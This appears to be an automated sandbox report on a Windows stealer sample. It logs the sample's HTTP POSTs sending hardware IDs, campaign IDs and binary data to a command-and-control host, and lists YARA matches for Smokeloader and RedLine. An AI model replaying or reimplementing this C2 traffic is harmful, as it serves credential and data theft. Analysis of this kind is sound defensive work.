2024-12-12 13:26:21 UTC	1369	IN	Data Raw: 45 34 78 31 50 6a 6d 4d 32 6a 72 67 68 38 7a 34 64 34 71 49 73 78 31 4a 4d 4b 46 48 46 38 30 4c 62 56 79 6d 4c 75 63 61 5a 6e 34 42 6e 6e 4a 59 56 2f 75 57 62 4b 50 57 6e 35 52 57 37 35 33 31 44 42 4e 76 39 53 39 33 6e 77 56 31 45 36 46 31 7a 45 67 6f 50 53 6a 54 64 58 34 70 68 73 46 61 73 4e 36 53 72 58 37 56 33 4e 59 63 43 6e 6a 31 43 68 65 52 43 7a 4e 63 75 58 32 37 53 47 52 73 56 38 56 6c 4e 44 4b 4c 30 6a 6a 6a 67 6f 50 6b 63 59 53 48 73 31 4e 62 4a 72 4d 62 46 34 63 4c 63 68 2f 7a 50 2f 4d 4c 64 6e 35 51 6f 77 74 41 61 73 2b 4c 54 72 37 41 6d 35 52 57 30 5a 4c 39 42 51 35 2b 34 6b 6b 5a 6e 30 52 31 52 4e 68 74 76 55 52 6d 66 67 48 64 43 69 67 70 78 73 45 33 38 2b 57 66 70 47 62 44 68 2b 4a 47 4c 32 76 69 41 33 62 53 57 7a 4a 63 72 32 33 7a 53 44 67 Data Ascii: E4x1PjmM2jrgh8z4d4qIsx1JMKFHF80LbVymLucaZn4BnnJYV/uWbKPWn5RW7531DBNv9S93nwV1E6F1zEgoPSjTdX4phsFasN6SrX7V3NYcCnj1CheRCzNcuX27SGRsV8VlNDKL0jjjgoPkcYSHs1NbJrMbF4cLch/zP/MLdn5QowtAas+LTr7Am5RW0ZL9BQ5+4kkZn0R1RNhtvURmfgHdCigpxsE38+WfpGbDh+JGL2viA3bSWzJcr23zSDg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49704	104.21.32.1	443	7868	C:\Users\user\Desktop\vPqd8HLs88.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 13:26:23 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=E1W1UCNHMM6I5H3131 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12854 Host: brendon-sharjen.biz
2024-12-12 13:26:23 UTC	12854	OUT	Data Raw: 2d 2d 45 31 57 31 55 43 4e 48 4d 4d 36 49 35 48 33 31 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 35 46 32 41 35 45 34 38 44 31 35 43 37 35 35 38 39 31 36 33 30 37 43 46 33 38 32 35 36 31 42 0d 0a 2d 2d 45 31 57 31 55 43 4e 48 4d 4d 36 49 35 48 33 31 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 31 57 31 55 43 4e 48 4d 4d 36 49 35 48 33 31 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 35 64 65 66 61 Data Ascii: --E1W1UCNHMM6I5H3131Content-Disposition: form-data; name="hwid"C5F2A5E48D15C7558916307CF382561B--E1W1UCNHMM6I5H3131Content-Disposition: form-data; name="pid"2--E1W1UCNHMM6I5H3131Content-Disposition: form-data; name="lid"HpOoIh--5defa
2024-12-12 13:26:24 UTC	1017	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 13:26:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gidlt28lv4ueqaquv7qm0e398g; expires=Mon, 07-Apr-2025 07:13:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7NFgVlXGLoArWn8J8SjAnbThxX2rE5S4ML04pVb5KG7NWuYcIYxDQQUpX6WhQaYQ8KN7u049s3YLZR1g467%2FI2xC3Zua5GbJtlMx%2BdAYabXB7TmCePzLEHlYrQVhO1KKWHjSQ2gj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0e0bbb9ede1885-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3223&min_rtt=1813&rtt_var=1687&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2850&recv_bytes=13797&delivery_rate=1610590&cwnd=193&unsent_bytes=0&cid=fbc52d17bb67ffac&ts=1171&x=0"
2024-12-12 13:26:24 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-12-12 13:26:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49705	104.21.32.1	443	7868	C:\Users\user\Desktop\vPqd8HLs88.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 13:26:25 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=NTPO6A4G0U2IZ9Q User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15063 Host: brendon-sharjen.biz
2024-12-12 13:26:25 UTC	15063	OUT	Data Raw: 2d 2d 4e 54 50 4f 36 41 34 47 30 55 32 49 5a 39 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 35 46 32 41 35 45 34 38 44 31 35 43 37 35 35 38 39 31 36 33 30 37 43 46 33 38 32 35 36 31 42 0d 0a 2d 2d 4e 54 50 4f 36 41 34 47 30 55 32 49 5a 39 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 54 50 4f 36 41 34 47 30 55 32 49 5a 39 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 35 64 65 66 61 30 36 66 63 36 61 62 0d 0a Data Ascii: --NTPO6A4G0U2IZ9QContent-Disposition: form-data; name="hwid"C5F2A5E48D15C7558916307CF382561B--NTPO6A4G0U2IZ9QContent-Disposition: form-data; name="pid"2--NTPO6A4G0U2IZ9QContent-Disposition: form-data; name="lid"HpOoIh--5defa06fc6ab
2024-12-12 13:26:26 UTC	1024	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 13:26:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7la6jobnrmjs15dgqgfsghurq4; expires=Mon, 07-Apr-2025 07:13:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eoNxZYf0%2Bu9PnpSq%2FWE04eT8gX9ZHzaomLoKKNoSbPlt%2Br5sB3zW593qa%2B75M3NshjpiLa5bRwohcIRsrSCE8ETcvzj%2FN3KiA3H%2FAcoyTPANW1ibVSKxKo0JpluZe5cixVqEp6fJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0e0bcb8f4e41c1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1655&rtt_var=627&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2851&recv_bytes=16003&delivery_rate=1764350&cwnd=205&unsent_bytes=0&cid=de92f9911e0f2915&ts=1006&x=0"
2024-12-12 13:26:26 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-12-12 13:26:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49706	104.21.32.1	443	7868	C:\Users\user\Desktop\vPqd8HLs88.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 13:26:28 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=7FX96EHX91 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20395 Host: brendon-sharjen.biz
2024-12-12 13:26:28 UTC	15331	OUT	Data Raw: 2d 2d 37 46 58 39 36 45 48 58 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 35 46 32 41 35 45 34 38 44 31 35 43 37 35 35 38 39 31 36 33 30 37 43 46 33 38 32 35 36 31 42 0d 0a 2d 2d 37 46 58 39 36 45 48 58 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 37 46 58 39 36 45 48 58 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 35 64 65 66 61 30 36 66 63 36 61 62 0d 0a 2d 2d 37 46 58 39 36 45 48 58 39 31 0d 0a 43 Data Ascii: --7FX96EHX91Content-Disposition: form-data; name="hwid"C5F2A5E48D15C7558916307CF382561B--7FX96EHX91Content-Disposition: form-data; name="pid"3--7FX96EHX91Content-Disposition: form-data; name="lid"HpOoIh--5defa06fc6ab--7FX96EHX91C
2024-12-12 13:26:28 UTC	5064	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 60 7e c3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 5c 5f f0 Data Ascii: lpQ0/74G6(~`~O\_
2024-12-12 13:26:30 UTC	1018	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 13:26:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=njm9d2bj22a7te9ah198mm2obs; expires=Mon, 07-Apr-2025 07:13:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wSXQeqlkTDZJoA9uXrqfp5ycmBiEcYzEO7U3JGs0sokVpgbw2hCOc%2BxVBU3t%2Bn3flIxQXE3pMkAYHGuUt6A4GoL2dBtD%2FEq1Ojf6JmB3HYBuqPe5bbvQFC9UKKtIzbvDMNG1rt0j"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0e0bdbae2a334e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1894&min_rtt=1887&rtt_var=722&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2851&recv_bytes=21352&delivery_rate=1501285&cwnd=173&unsent_bytes=0&cid=f72e4d3f2c2a0c2b&ts=1807&x=0"
2024-12-12 13:26:30 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-12-12 13:26:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49707	104.21.32.1	443	7868	C:\Users\user\Desktop\vPqd8HLs88.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 13:26:31 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2W80AL7USGD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1211 Host: brendon-sharjen.biz
2024-12-12 13:26:31 UTC	1211	OUT	Data Raw: 2d 2d 32 57 38 30 41 4c 37 55 53 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 35 46 32 41 35 45 34 38 44 31 35 43 37 35 35 38 39 31 36 33 30 37 43 46 33 38 32 35 36 31 42 0d 0a 2d 2d 32 57 38 30 41 4c 37 55 53 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 57 38 30 41 4c 37 55 53 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 35 64 65 66 61 30 36 66 63 36 61 62 0d 0a 2d 2d 32 57 38 30 41 4c 37 55 53 47 Data Ascii: --2W80AL7USGDContent-Disposition: form-data; name="hwid"C5F2A5E48D15C7558916307CF382561B--2W80AL7USGDContent-Disposition: form-data; name="pid"1--2W80AL7USGDContent-Disposition: form-data; name="lid"HpOoIh--5defa06fc6ab--2W80AL7USG
2024-12-12 13:26:32 UTC	1014	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 13:26:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=po2kcvbigv9mbg74ac20s20lif; expires=Mon, 07-Apr-2025 07:13:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YIQcFHc4zQhFI4otwgfRaemRDaaRFgk9DMK%2BwsVoZSZdYl3Jhr5sKIGRtcJqXomH5Qknf0G95CFYyg8K5%2FxENInA3f42EshfU%2Fe1YxW5mTfCBTOIBZf7Arip9Wxcnjts9cnjwLYr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0e0bf1af7f435b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1594&rtt_var=608&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2850&recv_bytes=2124&delivery_rate=1783750&cwnd=214&unsent_bytes=0&cid=40c0f1a9dab9fdda&ts=975&x=0"
2024-12-12 13:26:32 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-12-12 13:26:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49709	104.21.32.1	443	7868	C:\Users\user\Desktop\vPqd8HLs88.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 13:26:33 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=VR413592CERZVWBS8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1125 Host: brendon-sharjen.biz
2024-12-12 13:26:33 UTC	1125	OUT	Data Raw: 2d 2d 56 52 34 31 33 35 39 32 43 45 52 5a 56 57 42 53 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 35 46 32 41 35 45 34 38 44 31 35 43 37 35 35 38 39 31 36 33 30 37 43 46 33 38 32 35 36 31 42 0d 0a 2d 2d 56 52 34 31 33 35 39 32 43 45 52 5a 56 57 42 53 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 52 34 31 33 35 39 32 43 45 52 5a 56 57 42 53 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 35 64 65 66 61 30 36 66 Data Ascii: --VR413592CERZVWBS8Content-Disposition: form-data; name="hwid"C5F2A5E48D15C7558916307CF382561B--VR413592CERZVWBS8Content-Disposition: form-data; name="pid"1--VR413592CERZVWBS8Content-Disposition: form-data; name="lid"HpOoIh--5defa06f
2024-12-12 13:26:34 UTC	1018	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 13:26:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=j364ogjv494q2krh5ijamvfq6h; expires=Mon, 07-Apr-2025 07:13:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PErROVayUQfi3%2FddlvGb4wZuOhc%2Bg8LWNJD20PiCCMc5DWF3FmDvwaM95D7N38AKUeoLTu4vtSDyjp5ND6Xi5QGfL3EBA%2FELQ2jvWzEJMCDFdpO%2Fm9ZnFQQlISB6IKM0eJn7%2FXKv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0e0bff9fa2334e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2075&min_rtt=2026&rtt_var=794&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=2044&delivery_rate=1441263&cwnd=173&unsent_bytes=0&cid=dd61fdad9d11c451&ts=757&x=0"
2024-12-12 13:26:34 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-12-12 13:26:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49711	104.21.32.1	443	7868	C:\Users\user\Desktop\vPqd8HLs88.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 13:26:36 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 121 Host: brendon-sharjen.biz
2024-12-12 13:26:36 UTC	121	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 35 64 65 66 61 30 36 66 63 36 61 62 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 43 35 46 32 41 35 45 34 38 44 31 35 43 37 35 35 38 39 31 36 33 30 37 43 46 33 38 32 35 36 31 42 Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--5defa06fc6ab&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=C5F2A5E48D15C7558916307CF382561B
2024-12-12 13:26:37 UTC	1023	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 13:26:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=534feaiuakma0f0ivlgdhh5p4h; expires=Mon, 07-Apr-2025 07:13:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=veTo%2B8PrHtS8ODXbItdRyVA0s3iU1AeoIDhoZVceE4VLtNazd9DTvQyWhAwJxY86LjaqQ4%2F6HeZbRZEn194dFDcrBaqhWT%2BqVEtHrBb8ZsuCI4%2F%2BptFLOcXw%2FKm7kGZz%2Bw7ikx1i"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0e0c0cfb9c334e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1971&rtt_var=741&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1025&delivery_rate=1481481&cwnd=173&unsent_bytes=0&cid=982556374d292a4c&ts=1022&x=0"
2024-12-12 13:26:37 UTC	54	IN	Data Raw: 33 30 0d 0a 65 7a 31 41 4c 4a 4c 61 45 6e 68 43 4c 37 68 4e 79 79 5a 2f 70 78 58 66 74 4c 53 37 57 4c 30 5a 6e 62 79 33 4b 62 6e 50 75 79 49 67 59 41 3d 3d 0d 0a Data Ascii: 30ez1ALJLaEnhCL7hNyyZ/pxXftLS7WL0Znby3KbnPuyIgYA==
2024-12-12 13:26:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	08:26:15
Start date:	12/12/2024
Path:	C:\Users\user\Desktop\vPqd8HLs88.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\vPqd8HLs88.exe"
Imagebase:	0x400000
File size:	392'704 bytes
MD5 hash:	38A50F01C6D152CCDFA39DB654923C5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1667924711.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:26:36
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7868 -s 1732
Imagebase:	0xf30000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	10.7%
Signature Coverage:	66.8%
Total number of Nodes:	271
Total number of Limit Nodes:	21

Executed Functions

Function 00436E90 Relevance: 35.6, APIs: 11, Strings: 9, Instructions: 647
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044068C,00000000,00000001,0044067C,00000000), ref: 0043711D
SysAllocString.OLEAUT32(FA46F8B5), ref: 00437206
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437244
SysAllocString.OLEAUT32(FA46F8B5), ref: 0043729C
SysAllocString.OLEAUT32(FA46F8B5), ref: 00437327
VariantInit.OLEAUT32(E1E0FFF6), ref: 00437397
VariantClear.OLEAUT32(E1E0FFF6), ref: 004374C9
SysFreeString.OLEAUT32(?), ref: 004374ED
SysFreeString.OLEAUT32(?), ref: 004374F3
SysFreeString.OLEAUT32(00000000), ref: 00437500
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,E95BE783,00000000,00000000,00000000,00000000), ref: 00437538

Strings

7e#g, xrefs: 00437315
TU, xrefs: 00437304
/m:o, xrefs: 004372B4
A;, xrefs: 0043714B
E5G, xrefs: 004372E4
$i/k, xrefs: 004372AC
coPQ, xrefs: 00436F05
*y5{, xrefs: 004372CC
R&^, xrefs: 0043715F

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: $i/k$*y5{$/m:o$7e#g$A;$R&^$TU$coPQ$E5G
API String ID: 2573436264-1946897041
Opcode ID: 79a9e8f040c90b982cbc34a1def7326e6d8ea52aea20c5bf8f97e9566bda01bf
Instruction ID: 957688f558f255e0e7ff555bad3a131534093369ee1cfb722c1dc1fbac212707
Opcode Fuzzy Hash: 79a9e8f040c90b982cbc34a1def7326e6d8ea52aea20c5bf8f97e9566bda01bf
Instruction Fuzzy Hash: 072200B26083409BD3248F65C880B6BBBE2EFD9724F18892DF5D597381D778D805CB56

Function 00415871 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 390
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

)57L, xrefs: 00415CEB
9,-P, xrefs: 00415D17
4?#8, xrefs: 00415CF6
0<RX, xrefs: 00415D01
RW!!, xrefs: 00415D0C

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: )57L$0<RX$4?#8$9,-P$RW!!
API String ID: 0-1675874376
Opcode ID: d2f6307606761909721f2b0e13376f0ddd5a118a4948ccb4ef4b7e6e19ff4af2
Instruction ID: 944294a084fef500cf987cfcd5ab8545166bfb22ba062b216c7a22b9d9648bd9
Opcode Fuzzy Hash: d2f6307606761909721f2b0e13376f0ddd5a118a4948ccb4ef4b7e6e19ff4af2
Instruction Fuzzy Hash: 27D1D4B1608741CFC728CF28C8916AFBBE1BFD5314F148A2EE49A8B391D7349945CB46

Function 0042C294 Relevance: 9.3, APIs: 3, Strings: 2, Instructions: 581
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

